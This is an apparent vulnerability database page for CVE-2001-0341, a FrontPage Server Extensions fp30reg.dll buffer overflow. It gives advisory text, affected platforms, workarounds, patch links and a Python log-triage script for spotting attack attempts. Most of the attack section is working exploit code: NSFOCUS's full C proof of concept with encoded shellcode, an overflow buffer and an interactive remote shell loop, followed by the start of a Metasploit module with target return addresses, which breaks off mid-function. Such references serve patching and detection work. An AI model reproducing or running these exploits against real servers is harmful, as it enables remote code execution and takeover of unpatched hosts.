CVE-2001-0341
CVSS 7.5
Published: 2001-07-21 00:00:00
Revised: 2016-10-17 22:10:41

[Original] Buffer overflow in Microsoft Visual Studio RAD Support sub-component of FrontPage Server Extensions allows remote attackers to execute arbitrary commands via a long registration request (URL) to fp30reg.dll.


[CNNVD] Microsoft FrontPage 2000 Server Extensions fp30reg.dll Remote Buffer Overflow Vulnerability (MS01-035) (CNNVD-200107-156)

        Microsoft FrontPage 2000 Server Extensions is a software package developed by Microsoft to extend the functionality of the IIS web server.
        The FrontPage 2000 Server Extensions package ships a dynamic-link library, fp30reg.dll, that contains a buffer overflow vulnerability. A remote attacker who successfully exploits it can execute arbitrary instructions on the attacked host.

- CVSS (Base Score)

CVSS score: 7.5 [Severe (HIGH)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (Affected Platforms and Products)

cpe:/o:microsoft:windows_nt:4.0:sp5:workstation  (Microsoft Windows 4.0 sp5 workstation)
cpe:/o:microsoft:windows_nt:4.0:sp6:workstation  (Microsoft Windows 4.0 sp6 workstation)
cpe:/o:microsoft:windows_nt:4.0:sp3:workstation  (Microsoft Windows 4.0 sp3 workstation)
cpe:/o:microsoft:windows_nt:4.0:sp4:workstation  (Microsoft Windows 4.0 sp4 workstation)
cpe:/o:microsoft:windows_nt:4.0:sp1:workstation  (Microsoft Windows 4.0 sp1 workstation)
cpe:/o:microsoft:windows_nt:4.0:sp2:workstation  (Microsoft Windows 4.0 sp2 workstation)
cpe:/o:microsoft:windows_nt:4.0::workstation
cpe:/a:microsoft:frontpage_server_extensions:2000  (Microsoft frontpage_server_extensions 2000)
cpe:/o:microsoft:windows_nt:4.0:sp6a:server  (Microsoft Windows 4.0 sp6a server)
cpe:/o:microsoft:windows_nt:4.0::enterprise_server
cpe:/o:microsoft:windows_2000::sp1:datacenter_server  (Microsoft Windows 2000 Datacenter Server SP1)
cpe:/o:microsoft:windows_2000::sp2:datacenter_server  (Microsoft Windows 2000 Datacenter Server SP2)
cpe:/o:microsoft:windows_nt:4.0:sp3:enterprise_server
cpe:/o:microsoft:windows_nt:4.0:sp4:enterprise_server
cpe:/o:microsoft:windows_nt:4.0:sp5:terminal_server  (Microsoft Windows NT Terminal Server 4.0 SP5)
cpe:/o:microsoft:windows_nt:4.0:sp2:terminal_server  (Microsoft Windows NT Terminal Server 4.0 SP2)
cpe:/o:microsoft:windows_nt:4.0:sp1:enterprise_server
cpe:/o:microsoft:windows_nt:4.0:sp6:terminal_server  (Microsoft Windows NT Terminal Server 4.0 SP6)
cpe:/o:microsoft:windows_nt:4.0:sp6a:enterprise_server
cpe:/o:microsoft:windows_nt:4.0:sp2:enterprise_server
cpe:/o:microsoft:windows_2000:::advanced_server
cpe:/o:microsoft:windows_nt:4.0::server
cpe:/o:microsoft:windows_nt:4.0:sp5:enterprise_server
cpe:/o:microsoft:windows_nt:4.0:sp6:enterprise_server
cpe:/o:microsoft:windows_nt:4.0:sp4:terminal_server  (Microsoft Windows NT Terminal Server 4.0 SP4)
cpe:/o:microsoft:windows_nt:4.0:sp1:terminal_server  (Microsoft Windows NT Terminal Server 4.0 SP1)
cpe:/o:microsoft:windows_nt:4.0:sp6a:workstation  (Microsoft Windows 4.0 sp6a workstation)
cpe:/o:microsoft:windows_nt:4.0:sp3:terminal_server  (Microsoft Windows NT Terminal Server 4.0 SP3)
cpe:/o:microsoft:windows_nt:4.0:sp5:server  (Microsoft Windows 4.0 sp5 server)
cpe:/o:microsoft:windows_2000::sp1:professional  (Microsoft Windows 2000 Professional SP1)
cpe:/o:microsoft:windows_nt:4.0:sp6:server  (Microsoft Windows 4.0 sp6 server)
cpe:/o:microsoft:windows_2000::sp2:professional  (Microsoft Windows 2000 Professional SP2)
cpe:/o:microsoft:windows_nt:4.0:sp3:server  (Microsoft Windows 4.0 sp3 server)
cpe:/o:microsoft:windows_2000:::datacenter_server
cpe:/o:microsoft:windows_nt:4.0:sp4:server  (Microsoft Windows 4.0 sp4 server)
cpe:/o:microsoft:windows_2000::sp2:advanced_server  (Microsoft Windows 2000 Advanced Server SP2)
cpe:/o:microsoft:windows_nt:4.0:sp1:server  (Microsoft Windows 4.0 sp1 server)
cpe:/o:microsoft:windows_2000::sp1:advanced_server  (Microsoft Windows 2000 Advanced Server SP1)
cpe:/o:microsoft:windows_nt:4.0::terminal_server
cpe:/o:microsoft:windows_nt:4.0:sp2:server  (Microsoft Windows 4.0 sp2 server)
cpe:/o:microsoft:windows_2000::sp1:server  (Microsoft Windows 2000 Server SP1)
cpe:/o:microsoft:windows_2000:::server
cpe:/o:microsoft:windows_2000:::professional
cpe:/o:microsoft:windows_2000::sp2:server  (Microsoft Windows 2000 Server SP2)

- OVAL (Technical Details for Detection)

No related OVAL definitions were found

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0341
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0341
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200107-156
(Official data source) CNNVD

- Other Links and Resources

http://marc.info/?l=bugtraq&m=99348216322147&w=2
(UNKNOWN)  BUGTRAQ  20010625 NSFOCUS SA2001-03 : Microsoft FrontPage 2000 Server Extensions Buffer Overflow Vulnerability
http://www.microsoft.com/technet/security/bulletin/MS01-035.asp
(VENDOR_ADVISORY)  MS  MS01-035
http://www.securityfocus.com/bid/2906
(VENDOR_ADVISORY)  BID  2906
http://xforce.iss.net/static/6730.php
(UNKNOWN)  XF  frontpage-ext-rad-bo(6730)

- Vulnerability Information

Microsoft FrontPage 2000 Server Extensions fp30reg.dll Remote Buffer Overflow Vulnerability (MS01-035)
High risk  Unknown
2001-07-21 00:00:00 2012-11-28 00:00:00
Remote
        Microsoft FrontPage 2000 Server Extensions is a software package developed by Microsoft to extend the functionality of the IIS web server.
        The FrontPage 2000 Server Extensions package ships a dynamic-link library, fp30reg.dll, that contains a buffer overflow vulnerability. A remote attacker who successfully exploits it can execute arbitrary instructions on the attacked host.

- Advisories and Patches

        Temporary workaround:
        If you cannot install the patch or upgrade immediately, CNNVD recommends the following measures to reduce the threat:
        * FrontPage 2000 Server Extensions are installed in the following directory (on C:\ by default):
        "\Program Files\Common Files\Microsoft Shared\Web Server Extensions\40\"
        You can obtain the exact path by checking the path of the _vti_bin directory in "Internet Services Manager".
        If the file "\Program Files\Common Files\Microsoft Shared\Web Server Extensions\40\isapi\_vti_aut\fp30reg.dll" exists, your system may be directly attackable. We recommend deleting this file or resetting its permissions so that nobody can execute it.
        * We also recommend setting the permissions on "\Program Files\Common Files\Microsoft Shared\Web Server Extensions\40\bin\fp4areg.dll" so that nobody can execute it.
        * If you do not need FrontPage 2000 Server Extensions, we strongly recommend removing the service completely. To do so:
        1. Open a command prompt and change to the drive where FPSE is installed (C:\ by default)
        2. cd \Program Files\Common Files\Microsoft Shared\Web Server Extensions\40\bin
        3. fpsrvadm -o uninstall -p all
        This vulnerability was discovered by the NSFOCUS Security Team and reported to Microsoft; for details see the NSFOCUS security advisory:

        http://www.nsfocus.com/sa01-03.htm

        Vendor patch:
        Microsoft
        ---------
        Microsoft has released a security bulletin (MS01-035) and the corresponding patch:
        MS01-035: FrontPage Server Extension Sub-Component Contains Unchecked Buffer
        Link:
        http://www.microsoft.com/technet/security/bulletin/MS01-035.asp

        Patch download:
        . Microsoft Windows NT 4.0:

        http://www.microsoft.com/Downloads/Release.asp?ReleaseID=31038

        . Microsoft Windows 2000:

        http://www.microsoft.com/Downloads/Release.asp?ReleaseID=30727

- Vulnerability Information (20950)

MS Visual Studio RAD Support Buffer Overflow Vulnerability (EDBID:20950)
windows remote
2001-06-21 Verified
0 NSFOCUS Security Team
N/A
source: http://www.securityfocus.com/bid/2906/info

Due to an unchecked buffer in a subcomponent of FrontPage Server Extensions (Visual InterDev RAD Remote Deployment Support), a specially crafted request via 'fp30reg.dll' could allow a user to execute arbitrary commands in the context of IWAM_machinename on a host running IIS 5.0. On a host running IIS 4.0, the same request could allow the execution of arbitrary commands in the SYSTEM context.
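The crafted request described above shows up in IIS W3C logs as a hit on fp30reg.dll with an abnormally long query string (the NSFOCUS PoC on this page pads 258 bytes before the overwritten return address); the fp4areg.dll variant mentioned in the PoC additionally needs a traversal sequence in the path. The triage script below is an added example, not code from the page, NSFOCUS or Exploit-DB; the W3C field order, the 256-byte threshold and the sample log lines are assumptions constructed for the demonstration.

```python
"""Triage IIS W3C extended log lines for requests aimed at the FrontPage
RAD registration DLLs (fp30reg.dll, fp4areg.dll). Added example; the
field order and the query-length threshold are assumptions."""
from urllib.parse import unquote

REG_DLLS = ("fp30reg.dll", "fp4areg.dll")
# The PoC pads 258 bytes before the overwritten return address, so a
# registration query anywhere near that size deserves a look.
QUERY_LIMIT = 256

def parse_w3c(text):
    """Yield one {field: value} dict per data line of a W3C log."""
    fields = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split()
            if len(values) == len(fields):
                yield dict(zip(fields, values))

def classify(entry):
    """Return the reasons an entry is suspicious; an empty list means benign."""
    stem = entry.get("cs-uri-stem", "")
    query = entry.get("cs-uri-query", "-")
    decoded = unquote(stem).lower()
    if not decoded.endswith(REG_DLLS):
        return []
    reasons = ["request to FPSE registration DLL " + decoded.rsplit("/", 1)[-1]]
    if query != "-" and len(query) >= QUERY_LIMIT:
        reasons.append("query string of %d bytes (limit %d)" % (len(query), QUERY_LIMIT))
    # fp4areg.dll lives under ...\40\bin, outside the web root, so a hit on it
    # implies a traversal/decoding bug such as the ..%c1%9c sequence in the PoC.
    if ".." in decoded:
        reasons.append("path traversal sequence in URI stem")
    return reasons

def triage(text):
    """Return [(entry, reasons)] for every suspicious line in the log text."""
    hits = []
    for entry in parse_w3c(text):
        reasons = classify(entry)
        if reasons:
            hits.append((entry, reasons))
    return hits

# Constructed sample log (not real traffic): the second data line mimics the
# PoC's padded registration request, the third the fp4areg.dll variant.
SAMPLE_LOG = "\n".join([
    "#Software: Microsoft Internet Information Services 5.0",
    "#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status",
    "2001-06-25 10:00:01 192.0.2.10 GET /_vti_bin/_vti_aut/fp30reg.dll - 200",
    "2001-06-25 10:00:05 192.0.2.10 GET /_vti_bin/_vti_aut/fp30reg.dll "
    + "a" * 300 + " 500",
    "2001-06-25 10:00:09 192.0.2.10 GET /_vti_bin/..%c1%9cbin/fp4areg.dll - 200",
    "2001-06-25 10:01:00 198.51.100.7 GET /default.htm - 200",
])

if __name__ == "__main__":
    for entry, reasons in triage(SAMPLE_LOG):
        print(entry["time"], entry["c-ip"], entry["cs-uri-stem"][:48], "|", "; ".join(reasons))
```

Any request reaching either DLL is worth reviewing even without a long query, since the page's workaround is to remove the DLLs entirely; the length and traversal checks only rank the hits.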

/*
 *  fpse2000ex.c - Proof of concept code for fp30reg.dll overflow bug.
 *  Copyright (c) 2001 - Nsfocus.com
 *
 *  DISCLAIMS:
 *  This  is a proof of concept code.  This code is for test purpose 
 *  only and should not be run against any host without permission from 
 *  the system administrator.
 * 
 *  NSFOCUS Security Team <security@nsfocus.com>
 *  http://www.nsfocus.com
 */
 
#include  <stdio.h>
#include  <stdlib.h>      /* exit, atoi */
#include  <string.h>      /* memset, memcpy, strcpy, strncat, strlen */
#include  <strings.h>     /* bzero */
#include  <sys/time.h>
#include  <sys/types.h>
#include  <sys/socket.h>  /* socket, connect */
#include  <netinet/in.h>
#include  <arpa/inet.h>   /* inet_addr */
#include  <netdb.h>
#include  <signal.h>
#include  <unistd.h>
#include  <errno.h>

/* fat shellcode ;) */
char shellcode[] =
  "\xeb\x1a\x5f\x56\x56\x57\x5e\x33\xc9\xac\x3a\xc1\x74\x13\x3c\x30\x74\x5\x34"
  "\xaa\xaa\xeb\xf2\xac\x2c\x40\xeb\xf6\xe8\xe1\xff\xff\xff\xff\x21\x46\x2b\x46"
  "\xb6\xa3\xaa\xaa\xf9\xfc\xfd\x27\x17\x4e\x5c\x55\x55\x13\xed\xa8\xaa\xaa\x12"
  "\x66\x66\x66\x66\x59\x1\x6d\x2f\x66\x5d\x55\x55\xaa\xaa\xaa\xaa\x21\xef\xa2"
  "\x21\x22\x2e\xaa\xaa\xaa\x23\x27\x62\x5d\x55\x55\x21\xff\xa2\x21\x28\x22\xaa"
  "\xaa\xaa\x23\x2f\x6e\x5d\x55\x55\x21\xe7\xa2\x21\xfb\xa2\x23\x3f\x6a\x5d\x55"
  "\x55\x43\x61\xaf\xaa\xaa\x25\x2f\x16\x5d\x55\x55\x27\x17\x5a\x5d\x55\x55\xce"
  "\xb\xaa\xaa\xaa\xaa\x23\xed\xa2\xce\x23\x97\xaa\xaa\xaa\xaa\x6d\x2f\x5a\x5d"
  "\x55\x55\x55\x55\x55\x55\x21\x2f\x16\x5d\x55\x55\x29\x42\xad\x23\x2f\x5e\x5d"
  "\x55\x55\x6d\x2f\x12\x5d\x55\x55\xaa\xaa\x4a\xdd\x42\xcd\xaf\xaa\xaa\x29\x17"
  "\x66\x5d\x55\x55\xaa\xa5\x2f\x77\xab\xaa\xaa\x21\x27\x12\x5d\x55\x55\x2b\x6b"
  "\xaa\xaa\xab\xaa\x23\x27\x12\x5d\x55\x55\x2b\x17\x12\x5d\x55\x55\xaa\xaa\xaa"
  "\xd2\xdf\xa0\x6d\x2f\x12\x5d\x55\x55\xaa\xaa\x5a\x15\x21\x3f\x12\x5d\x55\x55"
  "\x99\x6a\xcc\x21\xa8\x97\xe7\xf0\xaa\xaa\xa5\x2f\x30\x70\xab\xaa\xaa\x21\x27"
  "\x12\x5d\x55\x55\x21\xfb\x96\x21\x2f\x12\x5d\x55\x55\x99\x63\xcc\x21\xa6\xba"
  "\x2b\x53\xfa\xef\xaa\xaa\xa5\x2f\xd3\xab\xaa\xaa\x21\x3f\x12\x5d\x55\x55\x21"
  "\xe8\x96\x21\x27\x12\x5d\x55\x55\x21\xfe\xab\xd2\xa9\x3f\x12\x5d\x55\x55\x23"
  "\x3f\x1e\x5d\x55\x55\x21\x2f\x1e\x5d\x55\x55\x21\xe2\xa6\xa9\x27\x12\x5d\x55"
  "\x55\x23\x27\x6\x5d\x55\x55\x21\x3f\x6\x5d\x55\x55\x2b\x90\xe1\xef\xf8\xe4\xa5"
  "\x2f\x99\xab\xaa\xaa\x21\x2f\x6\x5d\x55\x55\x2b\xd2\xae\xef\xe6\x99\x98\xa5"
  "\x2f\x8a\xab\xaa\xaa\x21\x27\x12\x5d\x55\x55\x23\x27\xe\x5d\x55\x55\x21\x3f"
  "\x1e\x5d\x55\x55\x21\x2f\x12\x5d\x55\x55\xa9\xe8\x8a\x23\x2f\x6\x5d\x55\x55"
  "\x6d\x2f\x2\x5d\x55\x55\xaa\xaa\xaa\xaa\x41\xb4\x21\x27\x2\x5d\x55\x55\x29\x6b"
  "\xab\x23\x27\x2\x5d\x55\x55\x21\x3f\x6\x5d\x55\x55\x29\x68\xae\x23\x3f\x6\x5d"
  "\x55\x55\x21\x2f\x1e\x5d\x55\x55\x21\x27\x2\x5d\x55\x55\x91\xe2\xb2\xa5\x27"
  "\x6a\xaa\xaa\xaa\x21\x3f\x6\x5d\x55\x55\x21\xa8\x21\x27\x12\x5d\x55\x55\x2b"
  "\x96\xab\xed\xcf\xde\xfa\xa5\x2f\xa\xaa\xaa\xaa\x21\x3f\x6\x5d\x55\x55\x21\xa8"
  "\x21\x27\x12\x5d\x55\x55\x2b\xd6\xab\xae\xd8\xc5\xc9\xeb\xa5\x2f\x2e\xaa\xaa"
  "\xaa\x21\x3f\x2\x5d\x55\x55\xa9\x3f\x2\x5d\x55\x55\xa9\x3f\x12\x5d\x55\x55"
  "\x21\x2f\x1e\x5d\x55\x55\x21\xe2\x8e\x99\x6a\xcc\x21\xae\xa0\x23\x2f\x6\x5d"
  "\x55\x55\x21\x27\x1e\x5d\x55\x55\x21\xfb\xba\x21\x2f\x6\x5d\x55\x55\x27\xe6"
  "\xba\x55\x23\x27\x6\x5d\x55\x55\x21\x3f\x6\x5d\x55\x55\xa9\x3f\x6\x5d\x55\x55"
  "\xa9\x3f\x6\x5d\x55\x55\xa9\x3f\x6\x5d\x55\x55\xa9\x3f\x12\x5d\x55\x55\x21\x2f"
  "\x1e\x5d\x55\x55\x21\xe2\xb6\x21\xbe\xa0\x23\x3f\x6\x5d\x55\x55\x21\x2f\x6\x5d"
  "\x55\x55\xa9\x2f\x12\x5d\x55\x55\x23\x2f\x66\x5d\x55\x55\x41\xaf\x43\xa7\x55"
  "\x55\x55\x43\xbc\x54\x55\x55\x27\x17\x5a\x5d\x55\x55\x21\xed\xa2\xce\x9\xaa"
  "\xaa\xaa\xaa\x29\x17\x66\x5d\x55\x55\xaa\xdf\xaf\x43\xf4\xa9\xaa\xaa\x6d\x2f"
  "\x6\x5d\x55\x55\xab\xaa\xaa\xaa\x41\xa5\x21\x27\x6\x5d\x55\x55\x29\x6b\xab\x23"
  "\x27\x6\x5d\x55\x55\x29\x17\x6\x5d\x55\x55\xa2\xd7\xc4\x21\x5e\x21\x3f\x16"
  "\x5d\x55\x55\xf8\x21\x2f\xe\x5d\x55\x55\xfa\x55\x3f\x66\x5d\x55\x55\x91\x5e"
  "\x3a\xe9\xe1\xe9\xe1\x21\x27\x6\x5d\x55\x55\x23\x2e\x27\x7a\x5d\x55\x55\x41"
  "\xa5\x21\x3f\x16\x5d\x55\x55\x29\x68\xab\x23\x3f\x16\x5d\x55\x55\x21\x2f\x16"
  "\x5d\x55\x55\xa5\x14\xa2\x2f\x63\xdf\xba\x21\x3f\x16\x5d\x55\x55\xa5\x14\xe8"
  "\xab\x2f\x6a\xde\xa8\x41\xa8\x41\x78\x21\x27\x16\x5d\x55\x55\x29\x6b\xab\x23"
  "\x27\x16\x5d\x55\x55\x43\xd0\x55\x55\x55\x6d\x2f\x8e\x5d\x55\x55\xa6\xaa\xaa"
  "\xaa\x6d\x2f\x82\x5d\x55\x55\xaa\xaa\xaa\xaa\x6d\x2f\x86\x5d\x55\x55\xab\xaa"
  "\xaa\xaa\x21\x5e\xc0\xaa\x27\x3f\x8e\x5d\x55\x55\xf8\x27\x2f\xe2\x5d\x55\x55"
  "\xfa\x27\x27\xe6\x5d\x55\x55\xfb\x55\x3f\x7e\x5d\x55\x55\x91\x5e\x3a\xe9\xe1"
  "\xe9\xe1\x21\x5e\xc0\xaa\x27\x3f\x8e\x5d\x55\x55\xf8\x27\x2f\xea\x5d\x55\x55"
  "\xfa\x27\x27\xee\x5d\x55\x55\xfb\x55\x3f\x7e\x5d\x55\x55\x91\x5e\x3a\xe9\xe1"
  "\xe9\xe1\x27\x17\xca\x5d\x55\x55\x99\x6a\x13\xbb\xaa\xaa\xaa\x58\x1\x6d\x2f"
  "\x26\x5d\x55\x55\xab\xab\xaa\xaa\xcc\x6d\x2f\x3a\x5d\x55\x55\xaa\xaa\x21\x3f"
  "\xee\x5d\x55\x55\x23\x3f\x32\x5d\x55\x55\x21\x2f\xe2\x5d\x55\x55\x23\x2f\x36"
  "\x5d\x55\x55\x21\x27\xe2\x5d\x55\x55\x23\x27\xa\x5d\x55\x55\x6d\x2f\x6\x5d\x55"
  "\x55\xaa\xaa\xaa\xaa\x21\x5e\x27\x3f\xfa\x5d\x55\x55\xf8\x27\x2f\xca\x5d\x55"
  "\x55\xfa\xc0\xaa\xc0\xaa\xc0\xaa\xc0\xab\xc0\xaa\xc0\xaa\x21\x27\x16\x5d\x55"
  "\x55\xfb\xc0\xaa\x55\x3f\x72\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x23\x2f"
  "\x6\x5d\x55\x55\x21\x3f\x16\x5d\x55\x55\x29\x68\xa2\x23\x3f\x16\x5d\x55\x55"
  "\x21\x5e\xc0\xaa\xc0\xaa\x27\x2f\x96\x5d\x55\x55\xfa\xc2\xaa\xa2\xaa\xaa\x27"
  "\x27\x56\x5d\x55\x55\xfb\x21\x3f\xe6\x5d\x55\x55\xf8\x55\x3f\x4a\x5d\x55\x55"
  "\x91\x5e\x3a\xe9\xe1\xe9\xe1\x6d\x2f\x6\x5d\x55\x55\xa2\xaa\xaa\xaa\x21\x5e"
  "\xc0\xaa\x27\x2f\x6\x5d\x55\x55\xfa\x21\x27\x16\x5d\x55\x55\x29\x6b\xa3\xfb"
  "\x21\x3f\x6a\x5d\x55\x55\xf8\x55\x3f\x62\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9"
  "\xe1\x12\xab\xaa\xaa\xaa\x2f\x6a\xa5\x2e\xf4\xab\xaa\xaa\x21\x5e\xc0\xaa\xc0"
  "\xaa\x27\x27\x96\x5d\x55\x55\xfb\xc2\xaa\xa2\xaa\xaa\x27\x3f\x56\x5d\x55\x55"
  "\xf8\x21\x2f\xe6\x5d\x55\x55\xfa\x55\x3f\x4a\x5d\x55\x55\x91\x5e\x3a\xe9\xe1"
  "\xe9\xe1\x29\x17\x96\x5d\x55\x55\xaa\xd4\xcb\x21\x5e\xc0\xaa\x27\x27\x96\x5d"
  "\x55\x55\xfb\x21\x3f\x96\x5d\x55\x55\xf8\x27\x2f\x56\x5d\x55\x55\xfa\x21\x27"
  "\xe6\x5d\x55\x55\xfb\x55\x3f\x4e\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x29"
  "\x17\x96\x5d\x55\x55\xaa\xd4\x8c\x21\x5e\xc0\xaa\x27\x3f\x96\x5d\x55\x55\xf8"
  "\x27\x2f\x56\x5d\x55\x55\xfa\x21\x27\x6a\x5d\x55\x55\xfb\x55\x3f\x62\x5d\x55"
  "\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x43\x68\xaa\xaa\xaa\x6d\x2f\x96\x5d\x55\x55"
  "\xaa\xa2\xaa\xaa\x21\x5e\x27\x3f\x96\x5d\x55\x55\xf8\x27\x2f\x56\x5d\x55\x55"
  "\xfa\x21\x27\x6a\x5d\x55\x55\xfb\x55\x3f\x6e\x5d\x55\x55\x91\x5e\x3a\xe9\xe1"
  "\xe9\xe1\x23\x2f\x6\x5d\x55\x55\x29\x17\x6\x5d\x55\x55\xab\xde\xf2\x6d\x2f\x6"
  "\x5d\x55\x55\xa2\xaa\xaa\xaa\x21\x5e\xc0\xaa\x27\x3f\x6\x5d\x55\x55\xf8\x21"
  "\x2f\x6\x5d\x55\x55\xfa\x21\x27\x16\x5d\x55\x55\xfb\x21\x3f\xea\x5d\x55\x55"
  "\xf8\x55\x3f\x42\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x12\xab\xaa\xaa\xaa"
  "\x2f\x6a\xde\xbc\x21\x5e\xc2\x55\x55\x55\xd5\x55\x3f\x46\x5d\x55\x55\x91\x5e"
  "\x3a\xe9\xe1\xe9\xe1\x41\x4b\x41\x87\x21\x5e\xc0\xaa\x27\x27\x96\x5d\x55\x55"
  "\xfb\x21\x3f\x96\x5d\x55\x55\xf8\x27\x2f\x56\x5d\x55\x55\xfa\x21\x27\xea\x5d"
  "\x55\x55\xfb\x55\x3f\x42\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x43\x3f\x54"
  "\x55\x55\x41\x54\xf2\xfa\x21\x17\x16\x5d\x55\x55\x23\xed\x58\x69\x21\xee\x8e"
  "\xa6\xaf\x12\xaa\xaa\xaa\x6d\xaa\xee\x99\x88\xbb\x99\x6a\x69\x41\x46\x42\x9a"
  "\x50\x55\x55\xe9\xd8\xcf\xcb\xde\xcf\xfa\xc3\xda\xcf\xaa\xe9\xd8\xcf\xcb\xde"
  "\xcf\xfa\xd8\xc5\xc9\xcf\xd9\xd9\xeb\xaa\xe9\xc6\xc5\xd9\xcf\xe2\xcb\xc4\xce"
  "\xc6\xcf\xaa\xfa\xcf\xcf\xc1\xe4\xcb\xc7\xcf\xce\xfa\xc3\xda\xcf\xaa\xf8\xcf"
  "\xcb\xce\xec\xc3\xc6\xcf\xaa\xfd\xd8\xc3\xde\xcf\xec\xc3\xc6\xcf\xaa\xf9\xc6"
  "\xcf\xcf\xda\xaa\xaa\xc9\xc7\xce\x84\xcf\xd2\xcf\xaa\xa7\xa0\xcf\xd2\xc3\xde"
  "\xa7\xa0\xaa\xf2\xe5\xf8\xee\xeb\xfe\xeb\xaa";



int
resolv (char *host, long *ip)
{
      struct hostent *hp;

      if ((*ip = inet_addr (host))<0) 
      {
        if ((hp = gethostbyname (host)) == NULL)
        {
          fprintf (stderr, "%s: unknown host\n", host);
          exit (-1);
        }
       *ip = *(unsigned long *) hp->h_addr;
     }
  return 0;
}

int
connect_to (char *hostname, short port)
{
  struct sockaddr_in sa;
  int s;

  s = socket (AF_INET, SOCK_STREAM, 0);
  resolv (hostname, (long *) &sa.sin_addr.s_addr);
  sa.sin_family = AF_INET;
  sa.sin_port = htons (port);
  if (connect (s, (struct sockaddr *) &sa, sizeof (sa)) == -1)
    {
       perror("connect");
       exit(-1);
   }

  return s;
}



void
runshell (int sockd)
{
  char buff[1024];
  int ret;
  fd_set fds;

  printf("\nPress CTRL_C to exit the shell!\n");
  for (;;)
    {

      FD_ZERO (&fds);
      FD_SET (0, &fds);
      FD_SET (sockd, &fds);

      if (select (sockd + 1, &fds, NULL, NULL, NULL) < 0)
        {
          exit (-1);
        }

      if (FD_ISSET (sockd, &fds))
        {
          bzero (buff, sizeof buff);
           if ((ret=read(sockd,buff,sizeof(buff)))<1)
            {
              fprintf (stderr, "Connection closed\n");
              exit (-1);
            }
          write(1,buff,ret);
        }

      if (FD_ISSET (0, &fds))
        {
          bzero (buff, sizeof buff);
          ret=read(0,buff,sizeof(buff));
          write(sockd,buff,ret);
        }
    }
}



int
main (int argc, char **argv)
{
  char overbuff[400];
  char buff[4096];

/* If system has the unicode bug, it is possible to attack fp4areg.dll */
/* char fppath[] = "/_vti_bin/..%c1%9cbin/fp4areg.dll"; */

  char fppath[] = "/_vti_bin/_vti_aut/fp30reg.dll";
  char server[] = "www.blahblah.com";
  char retaddress[] = "\x62\x18\xd5\x67";
  char jmpshell[] = "\xff\x66\x78";
  int  i, sockfd;
  int port = 80;

  if (argc < 2)
    {
      printf ("Proof of concept code for fp30reg.dll overflow bug by NSFOCUS Security Team\n\n");
      printf ("Usage: %s victim [port]\n", argv[0]);
      exit (-1);
    }

  if (argc > 2) port = atoi (argv[2]);

  sockfd = connect_to (argv[1], port);

  bzero (overbuff, sizeof (overbuff));
  bzero (buff, sizeof (buff));
  memset (overbuff, 'a', 258);
  memcpy (overbuff, jmpshell, strlen (jmpshell));
  strcpy (overbuff + 258, "%c");
  for (i = 0; i < 0x50; i += 4)
      strncat (overbuff, retaddress, 4);
  strcat (overbuff, "aaa");

  sprintf (buff,
           "GET %s?%s HTTP/1.1 \nHOST:%s\r\nContent-Type: \
text/html\nContent-Length:%d\r\nProxy_Connection: Keep-Alive\r\n\r\n%s",
           fppath, overbuff, server, strlen (shellcode), shellcode);
  printf ("buff len = %d\n", strlen (buff));

  write (sockfd, buff, strlen (buff));
  printf ("payload sent!\n");

  if(read (sockfd, buff, strlen(buff))<0)
  {
    printf("EOF\n");
    exit(-1);
  }
  else 
  {
    if(memcmp(buff,"XORDATA",8)==0)
    {
     printf("exploit succeed\n");
     /* Press Enter key to get the command prompt */
     runshell (sockfd);
    }
    else
    {
     printf("exploit failed\n");
     close(sockfd);
     exit(-1);
    }
  }

  return 0;
}


- Vulnerability Information (20951)

MS Visual Studio RAD Support Buffer Overflow Vulnerability (metasploit) (EDBID:20951)
windows remote
2001-06-21 Verified
0 NSFOCUS Security Team
N/A
source: http://www.securityfocus.com/bid/2906/info

Due to an unchecked buffer in a subcomponent of FrontPage Server Extensions (Visual InterDev RAD Remote Deployment Support), a specially crafted request via 'fp30reg.dll' could allow a user to execute arbitrary commands in the context of IWAM_machinename on a host running IIS 5.0. On a host running IIS 4.0, the same request could allow the execution of arbitrary commands in the SYSTEM context.

package Msf::Exploit::frontpage_fp30reg_chunked;
use base "Msf::Exploit";
use strict;

my $advanced = { }; 

my $info =
{
    'Name'  => 'Frontpage fp30reg.dll Chunked Encoding',
    'Version'  => '$Revision: 1.19 $',
    'Authors' => [ 'H D Moore <hdm [at] metasploit.com> [Artistic License]', ],
    'Arch'  => [ 'x86' ],
    'OS'    => [ 'win32' ],
    'Priv'  => 0,
    'UserOpts'  => {
                    'RHOST' => [1, 'ADDR', 'The target address'],
                    'RPORT' => [1, 'PORT', 'The target port', 80],
                    'SSL'   => [0, 'BOOL', 'Use SSL'],
                },

    'Payload' => {
                 'Space'  => 1024,
                 'BadChars'  => "\x00+&=%\x0a\x0d\x20",
               },
    
    'Description'  => qq{
        This is an exploit for the chunked encoding buffer overflow
        described in MS03-051 and originally reported by Brett
        Moore. This particular modules works against versions of
        Windows 2000 between SP0 and SP3. Service Pack 4 fixes the
        issue.
    },
              
    'Refs'  =>  [  
                    'http://www.osvdb.org/577',
                    'http://www.microsoft.com/technet/security/bulletin/ms03-051.mspx'
                ],
    'DefaultTarget' => 0,
    'Targets' => [
                   ['Windows 2000 SP0-SP3',  0x6c38a4d0],   # from mfc42.dll
                   ['Windows 2000 07/22/02', 0x67d44eb1],   # from fp30reg.dll 07/22/2002
                   ['Windows 2000 10/06/99', 0x67d4665d],   # from fp30reg.dll 10/06/1999
                 ],
};

sub new {
  my $class = shift;
  my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
  return($self);
}

sub Exploit {
    my $self = shift;

    my $target_host = $self->GetVar('RHOST');
    my $target_port = $self->GetVar('RPORT');
    my $target_idx  = $self->GetVar('TARGET');
